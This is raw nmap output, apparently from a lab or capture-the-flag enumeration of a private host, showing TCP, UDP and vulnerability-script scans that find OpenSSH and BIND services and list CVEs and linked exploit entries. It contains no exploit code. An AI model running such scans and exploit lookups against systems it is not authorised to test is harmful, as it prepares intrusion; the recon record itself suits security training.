|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 190.71 seconds
sudo nmap -sV -T4 -Pn -p- -O 192.168.110.250 -oA machines/192_168_110_250/enumeration/nmap/nmap_fullfast
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-19 11:45 CET
Nmap scan report for 192.168.110.250
Host is up (0.00052s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.79 seconds
sudo nmap -sUV -T4 -p1-1000 --version-intensity 0 192.168.110.250 -oA machines/192_168_110_250/enumeration/nmap/nmap_udp_fullfast
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-20 18:16 CET
Warning: 192.168.110.250 giving up on port because retransmission cap hit (6).
Nmap scan report for 192.168.110.250
Host is up (0.00078s latency).
Not shown: 982 closed ports
PORT STATE SERVICE VERSION
53/udp open domain ISC BIND 9.16.1 (Ubuntu Linux)
64/udp open|filtered tcpwrapped
96/udp open|filtered tcpwrapped
146/udp open|filtered tcpwrapped
159/udp open|filtered tcpwrapped
254/udp open|filtered tcpwrapped
325/udp open|filtered tcpwrapped
377/udp open|filtered tcpwrapped
434/udp open|filtered tcpwrapped
530/udp open|filtered tcpwrapped
573/udp open|filtered tcpwrapped
693/udp open|filtered tcpwrapped
701/udp open|filtered tcpwrapped
847/udp open|filtered tcpwrapped
873/udp open|filtered tcpwrapped
942/udp open|filtered tcpwrapped
958/udp open|filtered tcpwrapped
982/udp open|filtered tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1061.48 seconds
sudo nmap 192.168.110.250 -sV -oA 192_168_110_250/enumeration/nmap/vuln --script vuln -T5 -p22,53
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-26 12:09 CET
Nmap scan report for 192.168.110.250
Host is up (0.00059s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:8.2p1:
| CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778
| C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 6.8 https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 *EXPLOIT*
| 10213DBE-F683-58BB-B6D3-353173626207 6.8 https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207 *EXPLOIT*
| CVE-2020-12062 5.0 https://vulners.com/cve/CVE-2020-12062
| CVE-2021-28041 4.6 https://vulners.com/cve/CVE-2021-28041
| CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
| CVE-2016-20012 4.3 https://vulners.com/cve/CVE-2016-20012
|_ CVE-2021-36368 2.6 https://vulners.com/cve/CVE-2021-36368
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
| vulners:
| cpe:/a:isc:bind:9.16.1:
| CVE-2021-25216 6.8 https://vulners.com/cve/CVE-2021-25216
| CVE-2020-8625 6.8 https://vulners.com/cve/CVE-2020-8625
| PACKETSTORM:157836 5.0 https://vulners.com/packetstorm/PACKETSTORM:157836 *EXPLOIT*
| FBC03933-7A65-52F3-83F4-4B2253A490B6 5.0 https://vulners.com/githubexploit/FBC03933-7A65-52F3-83F4-4B2253A490B6 *EXPLOIT*
| CVE-2021-25220 5.0 https://vulners.com/cve/CVE-2021-25220
| CVE-2021-25219 5.0 https://vulners.com/cve/CVE-2021-25219
| CVE-2021-25215 5.0 https://vulners.com/cve/CVE-2021-25215
| CVE-2020-8620 5.0 https://vulners.com/cve/CVE-2020-8620
| CVE-2020-8616 5.0 https://vulners.com/cve/CVE-2020-8616
| CVE-2020-8623 4.3 https://vulners.com/cve/CVE-2020-8623
| CVE-2020-8621 4.3 https://vulners.com/cve/CVE-2020-8621
| CVE-2020-8617 4.3 https://vulners.com/cve/CVE-2020-8617
| 1337DAY-ID-34485 4.3 https://vulners.com/zdt/1337DAY-ID-34485 *EXPLOIT*
| CVE-2021-25214 4.0 https://vulners.com/cve/CVE-2021-25214
| CVE-2020-8624 4.0 https://vulners.com/cve/CVE-2020-8624
| CVE-2020-8622 4.0 https://vulners.com/cve/CVE-2020-8622
| CVE-2020-8619 4.0 https://vulners.com/cve/CVE-2020-8619
| CVE-2020-8618 4.0 https://vulners.com/cve/CVE-2020-8618
| CVE-2022-38178 0.0 https://vulners.com/cve/CVE-2022-38178
| CVE-2022-38177 0.0 https://vulners.com/cve/CVE-2022-38177
|_ CVE-2022-2795 0.0 https://vulners.com/cve/CVE-2022-2795
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.73 seconds